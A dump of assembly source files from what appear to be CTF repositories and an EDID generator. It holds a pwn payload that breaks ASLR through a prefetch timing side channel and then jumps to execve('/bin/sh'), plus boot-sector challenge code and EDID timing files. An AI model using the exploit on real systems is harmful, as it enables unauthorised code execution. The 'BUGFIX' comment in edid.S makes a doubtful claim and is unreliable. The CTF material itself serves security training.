/*0718*/ ISETP.NE.AND P0, PT, R30, RZ, PT ; /* 0x5b6b03800ff71e07 */
/* 0x001fc400fe6007ec */
/*0728*/ IADD32I R11, R11, 0x10 ; /* 0x1c00000001070b0b */
/*0730*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0738*/ FADD R10, R29, R10 ; /* 0x5c58000000a71d0a */
/* 0x001f8400fec007f5 */
/*0748*/ FADD R27, R27, R26 ; /* 0x5c58000001a71b1b */
/*0750*/ FADD R10, R28, R10 ; /* 0x5c58000000a71c0a */
/*0758*/ FADD R10, R10, R27 ; /* 0x5c58000001b70a0a */
/* 0x001fcc00fe0007f5 */
/*0768*/ FADD R23, R23, R22 ; /* 0x5c58000001671717 */
/*0770*/ { FADD R10, R10, R24 ; /* 0x5c58000001870a0a */
/*0778*/ DEPBAR.LE SB5, 0x5 }
/* 0xf0f0000034570000 */
/* 0x001fd400fe2007f3 */
/*0788*/ FADD R20, R21, R20 ; /* 0x5c58000001471514 */
/*0790*/ FADD R10, R10, R23 ; /* 0x5c58000001770a0a */
/*0798*/ FADD R19, R19, R18 ; /* 0x5c58000001271313 */
/* 0x001f8c00fe6007f0 */
/*07a8*/ { FADD R10, R10, R20 ; /* 0x5c58000001470a0a */
/*07b0*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*07b8*/ FADD R16, R17, R16 ; /* 0x5c58000001071110 */
/* 0x001fcc00fe0007fd */
/*07c8*/ FADD R10, R10, R19 ; /* 0x5c58000001370a0a */
/*07d0*/ { FADD R10, R10, R16 ; /* 0x5c58000001070a0a */
/*07d8*/ DEPBAR.LE SB5, 0x3 }
/* 0xf0f0000034370000 */
/* 0x001fcc00fe0007fd */
/*07e8*/ FADD R15, R15, R14 ; /* 0x5c58000000e70f0f */
/*07f0*/ { FADD R10, R10, R15 ; /* 0x5c58000000f70a0a */
/*07f8*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/* 0x001fcc00fe0007fd */
/*0808*/ FADD R12, R13, R12 ; /* 0x5c58000000c70d0c */
/*0810*/ { FADD R10, R10, R12 ; /* 0x5c58000000c70a0a */
/*0818*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x041fd800fe2007e6 */
/*0828*/ FADD R3, R6, R3 ; /* 0x5c58000000370603 */
/*0830*/ FADD R3, R10, R3 ; /* 0x5c58000000370a03 */
/*0838*/ FADD R4, R4, R9 ; /* 0x5c58000000970404 */
/* 0x081fc400ffa007f0 */
/*0848*/ { FADD R8, R3, R4 ; /* 0x5c58000000470308 */
/*0850*/ @P0 BRA 0x60 }
/* 0xe2400fff8080000f */
/*0858*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/* 0x001fd400fc4007e6 */
/*0868*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/*0870*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/*0878*/ STG.E [R2], R8 ; /* 0xeedc200000070208 */
/* 0x001f8000ffe007ff */
/*0888*/ EXIT ; /* 0xe30000000007000f */
/*0890*/ BRA 0x890 ; /* 0xe2400fffff87000f */
/*0898*/ NOP; /* 0x50b0000000070f00 */
/* 0x001f8000fc0007e0 */
/*08a8*/ NOP; /* 0x50b0000000070f00 */
/*08b0*/ NOP; /* 0x50b0000000070f00 */
/*08b8*/ NOP; /* 0x50b0000000070f00 */
..........................
|
AkaSec-1337-CyberSecurity-Club/Akasec-CTF-2024
| 2,600
|
pwn/bad_trip_and_the_absolute_horror_of_the_trip/pay.s
|
global _start
;-----------------------------------------------------------------------
; Prefetch-timing side channel: brute-forces the high 32 bits of an
; ASLR'd address by timing PREFETCHT2 against candidate addresses.
; A mapped (TLB/cache-resident) address prefetches measurably faster
; than an unmapped one; when a "fast" candidate is found we jump to
; the code-execution stub at _ok.
; NOTE(review): several immediates below are placeholders that must be
; patched with real leaked values before use (see inline comments).
;
; Register roles:
; rsi ---> temporary storage [time bfr prefetching]
; rbx ---> temporary storage [time after prefetching]
; rax ---> used for division
; rdi ---> temporary storage
; r8 ---> address iterator
; r9 ---> temporary storage
; r11 ---> full addr
; r10 ---> the time that prefetch took
; r12 ---> average
; r13 ---> latest time stamp counter
; r15 ---> temporary storage
;-----------------------------------------------------------------------
section .text
_start:
mov r8, 0x1000; ; first candidate for the high 32 address bits
mov r12, 0; ; running sum of probe times (for the average)
mov r13, 1; ; "latest" reference timestamp; 1 avoids div-by-zero logic issues
jmp _bruteforce;
_bruteforce :
mov rsp, 0xffffffff;
mov rbp, 0xffffffff; ; replace this with writable addr
cmp r8, 0xffff; ; simple loop
je _ok; ; once rdi equals 0xffff the exploit failed for some reason
; NOTE(review): the failure path also lands in _ok (the code-exec stub);
; presumably intentional as a last-ditch attempt -- confirm.
mov r11, 0x69696969; ; replace with real partial leak
call _assemble_addr;
call _rdtscp;
mov rsi, rax; ; moving starting time
; 17 back-to-back prefetches amplify the timing difference between a
; mapped and an unmapped candidate address.
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
prefetcht2 [r11];
call _rdtscp;
mov rbx, rax; ; moving ending time
mov r10, rbx;
sub r10, rsi; ; r10 = elapsed cycles for the prefetch burst
add r12, r10; ; adding to the average (r12 accumulates probe times)
mov rax, r13; ; checking if the 30% latest time stamp is bigger than our time
; stamp, if yes that means that the addr is fetched from the cache
imul rax, rax, 30;
xor rdx, rdx; ; rdx must be zero before unsigned DIV
mov rcx, 100;
div rcx; ; rax = 30% of the latest reference timestamp
cmp r10, rax; ; comparing the current ts with 30% latest ts if ths less we jump
; to code execution
jl _ok;
; well not this time, we need to check if the average of fetching
; operations is not that far from the latest time stamp, cause
; some times cpu needs to go on a cpu walk that takes time. this
; could interfere with our calculations
int3; ; NOTE(review): debugger breakpoint left in the hot loop -- confirm intentional
add r8, 1;
mov rcx, r8; ; rcx = number of iterations so far (used as divisor)
sub rcx, 0x1000;
mov rax, r12;
xor rdx, rdx; ; clear rdx again before the second unsigned DIV
div rcx; ; rax = average probe time
imul rax, rax, 2;
cmp rax, r10; ; outlier check: skip samples more than 2x the average
jl _bruteforce;
mov r13, r10; ; accept this sample as the new reference timestamp
jmp _bruteforce;
;; performing checks
_assemble_addr : ;; r11 contains half addr and r8 contains addr iter
mov rdi, r8;
sal rdi, 32; ; candidate high bits go into bits 63..32
or rdi, r11; ; combine with the leaked low half
mov r11, rdi; ; r11 = full candidate address
ret;
_rdtscp :
; Returns the full 64-bit timestamp counter in rax.
; NOTE(review): RDTSCP also clobbers rcx (IA32_TSC_AUX) and rdx;
; callers here reload both before relying on them.
rdtscp;
shl rdx, 32;
or rax, rdx; ; rax = (rdx << 32) | rax
ret;
_ok : ; aslr broken ready to call sys from libc
mov rax, r11;
sub rax, 0xfffffff; ; replace this with libc puts addr
mov rdi, rax;
add rdi, 0xffffffff; ; replace this with /bin/sh addr
mov rsi, 0;
mov rdx, 0;
mov r8, rax;
add r8, 0xffffffffff; ; replace this with execve addr
jmp r8; ; tail-jump into libc execve("/bin/sh", 0, 0)
ret;
|
AkaSec-1337-CyberSecurity-Club/CyberOdyssey_2024_Qualifications
| 1,440
|
Pwn/burg/src/boot.s
|
bits 16:
; NOTE(review): the trailing ':' after the BITS directive looks like a
; typo (NASM expects plain `bits 16`) -- confirm this assembles.
;-----------------------------------------------------------------------
; Stage-1 boot sector: sets 80x25 text mode, loads the next stage from
; disk to 0x7e00, installs a flat GDT, switches to protected mode and
; far-jumps into the 32-bit loader `kload`, which calls the C `main`.
; Padded to 510 bytes and terminated with the 0xAA55 boot signature.
;-----------------------------------------------------------------------
section .boot;
global boot;
%define NULL_SEG 0
%define CODE_SEG 0x8
%define DATA_SEG 0x10
%define RCODE_SEG 0x18
%define RDATA_SEG 0x20
boot:
mov ah, 0x00; Function: Set video mode
mov al, 0x03; Mode: 80x25 text mode (mode 3)
int 0x10; Call BIOS interrupt
call load_step1_5; loading the second step from the second sector
call load_gdt;
; pivoting to protected_mode: set CR0.PE, then far-jump to flush the
; prefetch queue and load CS with the 32-bit code selector.
cli;
mov eax, cr0;
or eax, 1;
mov cr0, eax;
mov ax, DATA_SEG ; ax carries the data selector into kload
jmp CODE_SEG:kload;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GDT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Five descriptors: null, 32-bit code/data (flat 4 GiB, 4 KiB gran),
; then 16-bit "real mode"-style code/data (64 KiB limit, byte gran).
gdt_data:
dd 0
dd 0
;gdt_code:
dw 0xFFFF
dw 0
db 0
db 10011010b ; present, ring 0, code, readable
db 11001111b ; 4 KiB granularity, 32-bit, limit 19..16 = 0xF
db 0
;gdt_data:
dw 0xFFFF
dw 0
db 0
db 10010010b ; present, ring 0, data, writable
db 11001111b
db 0
; rmode gdt
; gdt code
dw 0xFFFF
dw 0
db 0
db 0x9e
db 0 ; byte granularity, 16-bit default size
db 0
; gdt data:
dw 0xFFFF
dw 0
db 0
db 0x92
db 0
db 0
gdt_end:
gdt_ptr:
dw gdt_end - gdt_data - 1; ; GDT limit (size - 1)
dd gdt_data ; GDT linear base address
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
load_step1_5:
; BIOS int 13h AH=02: read AL sectors starting at CL into ES:BX.
; NOTE(review): CH (cylinder), DH (head) and DL (drive) are not set
; here -- this relies on their BIOS-provided boot values; confirm.
mov ah, 0x2;
mov al, 0x3; read 3 sectors (AL = sector count)
mov cl, 0x2; start at sector 2 (sector 1 is this boot sector)
mov bx, 0x7e00; load right after the boot sector at 0x7c00
int 0x13;
ret;
load_gdt:
cli;
pusha;
lgdt [gdt_ptr];
sti;
popa;
ret;
bits 32
kload:
; ax still holds DATA_SEG from `boot`; load all data segments with it.
mov ds, ax
mov ss, ax
mov es, ax
mov esp,kernel_stack_top;
pusha
extern main
call main
popa
jmp -2; ; NOTE(review): intended as a hang after main returns -- `jmp $` is the usual idiom; confirm
times 510 - ($-$$) db 0 ; pad boot sector to 510 bytes
dw 0xaa55 ; BIOS boot signature
section .bss
align 4
kernel_stack_bottom: equ $
resb 16384 ; 16 KB
kernel_stack_top:
|
AkaSec-1337-CyberSecurity-Club/CyberOdyssey_2024_Qualifications
| 2,039
|
Pwn/burg/test/src/boot.s
|
bits 16:
; NOTE(review): the trailing ':' after the BITS directive looks like a
; typo (NASM expects plain `bits 16`) -- confirm this assembles.
;-----------------------------------------------------------------------
; Stage-1 boot sector (test variant): enters protected mode and calls
; the C `main`; when main returns it drops BACK to real mode via the
; 16-bit GDT descriptors, reads one sector (the "flag") from disk to
; 0x7d00 and prints it with BIOS teletype output.
;-----------------------------------------------------------------------
section .boot;
global boot;
;org 0x7c00
%define NULL_SEG 0
%define CODE_SEG 0x8
%define DATA_SEG 0x10
%define RCODE_SEG 0x18
%define RDATA_SEG 0x20
boot:
mov ah, 0x00; Function: Set video mode
mov al, 0x03; Mode: 80x25 text mode (mode 3)
int 0x10; Call BIOS interrupt
call load_step1_5; loading the second step from the second sector
call load_gdt;
; pivoting to protected_mode: set CR0.PE, then far-jump to reload CS.
cli;
mov eax, cr0;
or eax, 1;
mov cr0, eax;
mov ax, DATA_SEG ; ax carries the data selector into kload
jmp CODE_SEG:kload;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GDT ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Five descriptors: null, 32-bit code/data (flat 4 GiB, 4 KiB gran),
; then 16-bit code/data (64 KiB limit) used for the real-mode return.
gdt_data:
dd 0
dd 0
;gdt_code:
dw 0xFFFF
dw 0
db 0
db 10011010b ; present, ring 0, code, readable
db 11001111b ; 4 KiB granularity, 32-bit
db 0
;gdt_data:
dw 0xFFFF
dw 0
db 0
db 10010010b ; present, ring 0, data, writable
db 11001111b
db 0
; rmode gdt
; gdt code
dw 0xFFFF
dw 0
db 0
db 0x9e
db 0 ; byte granularity, 16-bit default size
db 0
; gdt data:
dw 0xFFFF
dw 0
db 0
db 0x92
db 0
db 0
gdt_end:
gdt_ptr:
dw gdt_end - gdt_data - 1; ; GDT limit (size - 1)
dd gdt_data ; GDT linear base address
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
print:
; BIOS teletype: prints the NUL-terminated string at DS:SI.
lodsb
or al, al ; NUL terminator?
jz PrintReturn
mov ah, 0eh ; int 10h AH=0E: teletype output of AL
int 10h
jmp print
PrintReturn:
ret
load_step1_5:
; BIOS int 13h AH=02: read AL sectors starting at CL into ES:BX.
; NOTE(review): CH/DH/DL are not set -- relies on BIOS boot values; confirm.
mov ah, 0x2;
mov al, 0x3; read 3 sectors (AL = sector count)
mov cl, 0x2; start at sector 2 (sector 1 is this boot sector)
mov bx, 0x7e00;
int 0x13;
ret;
load_gdt:
cli;
pusha;
lgdt [gdt_ptr];
sti;
popa;
ret;
bits 32
kload:
; ax still holds DATA_SEG from `boot`; load all data segments with it.
mov ds, ax
mov ss, ax
mov es, ax
mov esp,kernel_stack_top;
pusha
extern main
call main
popa
; returning from c code
; delete me please
; returning to 16 bit mode: load 16-bit segments, clear CR0.PE, then
; far-jump with CS=0 before touching BIOS services again.
mov ax, RDATA_SEG
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0xFFFF
jmp RCODE_SEG:rmode_stub
bits 16
rmode_stub:
mov eax, cr0
and eax, 0xfffffffe ; clear PE bit -> back to real mode
mov cr0, eax
jmp 0:prot_to_real ; reload CS with a real-mode segment
prot_to_real:
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
sti
call load_flag;
mov si, 0x7d00; ; print the sector just loaded by load_flag
call print;
jmp -2; ; NOTE(review): intended as a hang -- `jmp $` is the usual idiom; confirm
load_flag:
; Read 1 sector (sector 5) to 0x0000:0x7d00.
mov ah, 0x2;
mov al, 0x1;
mov cl, 0x5;
mov bx, 0x7d00;
int 0x13;
ret;
msg: db "hello world", 0x0;
times 510 - ($-$$) db 0 ; pad boot sector to 510 bytes
dw 0xaa55 ; BIOS boot signature
section .bss
align 4
kernel_stack_bottom: equ $
resb 16384 ; 16 KB
kernel_stack_top:
|
akatrevorjay/edid-generator
| 1,292
|
1680x1050.S
|
/*
1680x1050.S: EDID data set for standard 1680x1050 60 Hz monitor
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* Mode parameters only; the EDID block itself is built by edid.S. */
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 146250 /* kHz */
#define XPIX 1680 /* horizontal active pixels */
#define YPIX 1050 /* vertical active lines */
#define XY_RATIO XY_RATIO_16_10
#define XBLANK 560 /* horizontal blanking, pixels */
#define YBLANK 39 /* vertical blanking, lines */
#define XOFFSET 104 /* hsync front porch, pixels */
#define XPULSE 176 /* hsync pulse width, pixels */
#define YOFFSET (63+3) /* NOTE(review): 63 appears to be a bias stripped by edid.S; vsync offset = 3 lines -- confirm */
#define YPULSE (63+6) /* same bias; vsync pulse width = 6 lines */
#define DPI 96
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux WSXGA"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1 /* 1 = positive polarity */
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,138
|
800x600.S
|
/*
800x600.S: EDID data set for standard 800x600 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
Copyright (C) 2014 Linaro Limited
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
*/
/* Mode parameters only; the EDID block itself is built by edid.S. */
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 40000 /* kHz */
#define XPIX 800 /* horizontal active pixels */
#define YPIX 600 /* vertical active lines */
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 256 /* horizontal blanking, pixels */
#define YBLANK 28 /* vertical blanking, lines */
#define XOFFSET 40 /* hsync front porch, pixels */
#define XPULSE 128 /* hsync pulse width, pixels */
#define YOFFSET (63+1) /* NOTE(review): 63 appears to be a bias stripped by edid.S; vsync offset = 1 line -- confirm */
#define YPULSE (63+4) /* same bias; vsync pulse width = 4 lines */
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux SVGA"
#define ESTABLISHED_TIMING1_BITS 0x01 /* Bit 0: 800x600 @ 60Hz */
#define HSYNC_POL 1 /* 1 = positive polarity */
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,288
|
1600x1200.S
|
/*
1600x1200.S: EDID data set for standard 1600x1200 60 Hz monitor
Copyright (C) 2013 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* Mode parameters only; the EDID block itself is built by edid.S. */
/* EDID */
#define VERSION 1
#define REVISION 3
/* Display */
#define CLOCK 162000 /* kHz */
#define XPIX 1600 /* horizontal active pixels */
#define YPIX 1200 /* vertical active lines */
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 560 /* horizontal blanking, pixels */
#define YBLANK 50 /* vertical blanking, lines */
#define XOFFSET 64 /* hsync front porch, pixels */
#define XPULSE 192 /* hsync pulse width, pixels */
#define YOFFSET (63+1) /* NOTE(review): 63 appears to be a bias stripped by edid.S; vsync offset = 1 line -- confirm */
#define YPULSE (63+3) /* same bias; vsync pulse width = 3 lines */
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux UXGA"
/* No ESTABLISHED_TIMINGx_BITS */
#define HSYNC_POL 1 /* 1 = positive polarity */
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,288
|
1280x1024.S
|
/*
1280x1024.S: EDID data set for standard 1280x1024 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
/* EDID structure version/revision advertised in the block (EDID 1.3). */
#define VERSION 1
#define REVISION 3
/* Display */
/* Detailed timing for 1280x1024@60 ("Linux SXGA"); pixel clock in kHz. */
#define CLOCK 108000 /* kHz */
#define XPIX 1280
#define YPIX 1024
#define XY_RATIO XY_RATIO_5_4
#define XBLANK 408
#define YBLANK 42
#define XOFFSET 48
#define XPULSE 112
/* +63 bias: edid.S subtracts 63 when emitting the descriptor byte
   (see y_snc_lsb), so real vsync offset = 1 line, pulse = 3 lines. */
#define YOFFSET (63+1)
#define YPULSE (63+3)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux SXGA"
/* No ESTABLISHED_TIMINGx_BITS */
/* Sync polarities: 1 = positive (consumed by the "features" byte in edid.S). */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akatrevorjay/edid-generator
| 9,709
|
edid.S
|
/*
edid.S: EDID data template
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* Manufacturer */
#define MFG_LNX1 'L'
#define MFG_LNX2 'N'
#define MFG_LNX3 'X'
#define SERIAL 0
#define YEAR 2012
#define WEEK 5
/* EDID 1.3 standard definitions */
#define XY_RATIO_16_10 0b00
#define XY_RATIO_4_3 0b01
#define XY_RATIO_5_4 0b10
#define XY_RATIO_16_9 0b11
/* Provide defaults for the timing bits */
#ifndef ESTABLISHED_TIMING1_BITS
#define ESTABLISHED_TIMING1_BITS 0x00
#endif
#ifndef ESTABLISHED_TIMING2_BITS
#define ESTABLISHED_TIMING2_BITS 0x00
#endif
#ifndef ESTABLISHED_TIMING3_BITS
#define ESTABLISHED_TIMING3_BITS 0x00
#endif
/* Pack a three-letter PnP manufacturer id ('A'=1 .. 'Z'=26, 5 bits each)
   into a big-endian 16-bit word; stored via swap16 because .hword emits
   little-endian on x86 while EDID wants this field big-endian. */
#define mfgname2id(v1,v2,v3) \
((((v1-'@')&0x1f)<<10)+(((v2-'@')&0x1f)<<5)+((v3-'@')&0x1f))
#define swap16(v1) ((v1>>8)+((v1&0xff)<<8))
/* One byte holding bits 11-8 of v1 (high nibble) and v2 (low nibble). */
#define msbs2(v1,v2) ((((v1>>8)&0x0f)<<4)+((v2>>8)&0x0f))
/* Sync msbits byte of the detailed timing descriptor (byte 11):
     bits 7-6 = hsync offset bits 9-8     bits 5-4 = hsync pulse bits 9-8
     bits 3-2 = vsync offset bits 5-4     bits 1-0 = vsync pulse bits 5-4
   The vertical arguments arrive with the +63 bias used by y_snc_lsb, so
   the bias is stripped before extracting the msbits.
   BUGFIX: the previous definition masked the LOW two bits of each value
   and then shifted them further right, so it always evaluated to 0 and
   any timing with offsets/pulses above the lsb range was emitted wrong. */
#define msbs4(v1,v2,v3,v4) \
((((v1>>8)&0x03)<<6)+(((v2>>8)&0x03)<<4)+((((v3-63)>>4)&0x03)<<2)+(((v4-63)>>4)&0x03))
/* Approximate millimetres from pixels at a given dpi (25 mm/in, truncated). */
#define pixdpi2mm(pix,dpi) ((pix*25)/dpi)
#define xsize pixdpi2mm(XPIX,DPI)
#define ysize pixdpi2mm(YPIX,DPI)
.data
/* Fixed header pattern */
header: .byte 0x00,0xff,0xff,0xff,0xff,0xff,0xff,0x00
mfg_id: .hword swap16(mfgname2id(MFG_LNX1, MFG_LNX2, MFG_LNX3))
prod_code: .hword 0
/* Serial number. 32 bits, little endian. */
serial_number: .long SERIAL
/* Week of manufacture */
week: .byte WEEK
/* Year of manufacture, less 1990. (1990-2245)
If week=255, it is the model year instead */
year: .byte YEAR-1990
version: .byte VERSION /* EDID version, usually 1 (for 1.3) */
revision: .byte REVISION /* EDID revision, usually 3 (for 1.3) */
/* If Bit 7=1 Digital input. If set, the following bit definitions apply:
Bits 6-1 Reserved, must be 0
Bit 0 Signal is compatible with VESA DFP 1.x TMDS CRGB,
1 pixel per clock, up to 8 bits per color, MSB aligned,
If Bit 7=0 Analog input. If clear, the following bit definitions apply:
Bits 6-5 Video white and sync levels, relative to blank
00=+0.7/-0.3 V; 01=+0.714/-0.286 V;
10=+1.0/-0.4 V; 11=+0.7/0 V
Bit 4 Blank-to-black setup (pedestal) expected
Bit 3 Separate sync supported
Bit 2 Composite sync (on HSync) supported
Bit 1 Sync on green supported
Bit 0 VSync pulse must be serrated when composite or
sync-on-green is used. */
video_parms: .byte 0x6d /* analog, separate+composite sync, sync-on-green */
/* Maximum horizontal image size, in centimetres
(max 292 cm/115 in at 16:9 aspect ratio) */
max_hor_size: .byte xsize/10
/* Maximum vertical image size, in centimetres.
If either byte is 0, undefined (e.g. projector) */
max_vert_size: .byte ysize/10
/* Display gamma, minus 1, times 100 (range 1.00-3.54) */
gamma: .byte 120 /* i.e. gamma 2.20 */
/* Bit 7 DPMS standby supported
Bit 6 DPMS suspend supported
Bit 5 DPMS active-off supported
Bits 4-3 Display type: 00=monochrome; 01=RGB colour;
10=non-RGB multicolour; 11=undefined
Bit 2 Standard sRGB colour space. Bytes 25-34 must contain
sRGB standard values.
Bit 1 Preferred timing mode specified in descriptor block 1.
Bit 0 GTF supported with default parameter values. */
dsp_features: .byte 0xea
/* Chromaticity coordinates. */
/* Red and green least-significant bits
Bits 7-6 Red x value least-significant 2 bits
Bits 5-4 Red y value least-significant 2 bits
Bits 3-2 Green x value least-significant 2 bits
Bits 1-0 Green y value least-significant 2 bits */
red_green_lsb: .byte 0x5e
/* Blue and white least-significant 2 bits */
blue_white_lsb: .byte 0xc0
/* Red x value most significant 8 bits.
0-255 encodes 0-0.996 (255/256); 0-0.999 (1023/1024) with lsbits */
red_x_msb: .byte 0xa4
/* Red y value most significant 8 bits */
red_y_msb: .byte 0x59
/* Green x and y value most significant 8 bits */
green_x_y_msb: .byte 0x4a,0x98
/* Blue x and y value most significant 8 bits */
blue_x_y_msb: .byte 0x25,0x20
/* Default white point x and y value most significant 8 bits */
white_x_y_msb: .byte 0x50,0x54
/* Established timings */
/* Bit 7 720x400 @ 70 Hz
Bit 6 720x400 @ 88 Hz
Bit 5 640x480 @ 60 Hz
Bit 4 640x480 @ 67 Hz
Bit 3 640x480 @ 72 Hz
Bit 2 640x480 @ 75 Hz
Bit 1 800x600 @ 56 Hz
Bit 0 800x600 @ 60 Hz */
estbl_timing1: .byte ESTABLISHED_TIMING1_BITS
/* Bit 7 800x600 @ 72 Hz
Bit 6 800x600 @ 75 Hz
Bit 5 832x624 @ 75 Hz
Bit 4 1024x768 @ 87 Hz, interlaced (1024x768)
Bit 3 1024x768 @ 60 Hz
Bit 2 1024x768 @ 72 Hz
Bit 1 1024x768 @ 75 Hz
Bit 0 1280x1024 @ 75 Hz */
estbl_timing2: .byte ESTABLISHED_TIMING2_BITS
/* Bit 7 1152x870 @ 75 Hz (Apple Macintosh II)
Bits 6-0 Other manufacturer-specific display modes */
estbl_timing3: .byte ESTABLISHED_TIMING3_BITS
/* Standard timing */
/* X resolution, less 31, divided by 8 (256-2288 pixels) */
std_xres: .byte (XPIX/8)-31
/* Y resolution, X:Y pixel ratio
Bits 7-6 X:Y pixel ratio: 00=16:10; 01=4:3; 10=5:4; 11=16:9.
Bits 5-0 Vertical frequency, less 60 (60-123 Hz) */
std_vres: .byte (XY_RATIO<<6)+VFREQ-60
.fill 7,2,0x0101 /* Unused standard timing slots (0x0101 = "unused") */
descriptor1:
/* Pixel clock in 10 kHz units. (0.-655.35 MHz, little-endian) */
clock: .hword CLOCK/10
/* Horizontal active pixels 8 lsbits (0-4095) */
x_act_lsb: .byte XPIX&0xff
/* Horizontal blanking pixels 8 lsbits (0-4095)
End of active to start of next active. */
x_blk_lsb: .byte XBLANK&0xff
/* Bits 7-4 Horizontal active pixels 4 msbits
Bits 3-0 Horizontal blanking pixels 4 msbits */
x_msbs: .byte msbs2(XPIX,XBLANK)
/* Vertical active lines 8 lsbits (0-4095) */
y_act_lsb: .byte YPIX&0xff
/* Vertical blanking lines 8 lsbits (0-4095) */
y_blk_lsb: .byte YBLANK&0xff
/* Bits 7-4 Vertical active lines 4 msbits
Bits 3-0 Vertical blanking lines 4 msbits */
y_msbs: .byte msbs2(YPIX,YBLANK)
/* Horizontal sync offset pixels 8 lsbits (0-1023) From blanking start */
x_snc_off_lsb: .byte XOFFSET&0xff
/* Horizontal sync pulse width pixels 8 lsbits (0-1023) */
x_snc_pls_lsb: .byte XPULSE&0xff
/* Bits 7-4 Vertical sync offset lines 4 lsbits (0-63)
Bits 3-0 Vertical sync pulse width lines 4 lsbits (0-63)
(YOFFSET/YPULSE are defined with a +63 bias, removed here) */
y_snc_lsb: .byte ((YOFFSET-63)<<4)+(YPULSE-63)
/* Bits 7-6 Horizontal sync offset pixels 2 msbits
Bits 5-4 Horizontal sync pulse width pixels 2 msbits
Bits 3-2 Vertical sync offset lines 2 msbits
Bits 1-0 Vertical sync pulse width lines 2 msbits */
xy_snc_msbs: .byte msbs4(XOFFSET,XPULSE,YOFFSET,YPULSE)
/* Horizontal display size, mm, 8 lsbits (0-4095 mm, 161 in) */
x_dsp_size: .byte xsize&0xff
/* Vertical display size, mm, 8 lsbits (0-4095 mm, 161 in) */
y_dsp_size: .byte ysize&0xff
/* Bits 7-4 Horizontal display size, mm, 4 msbits
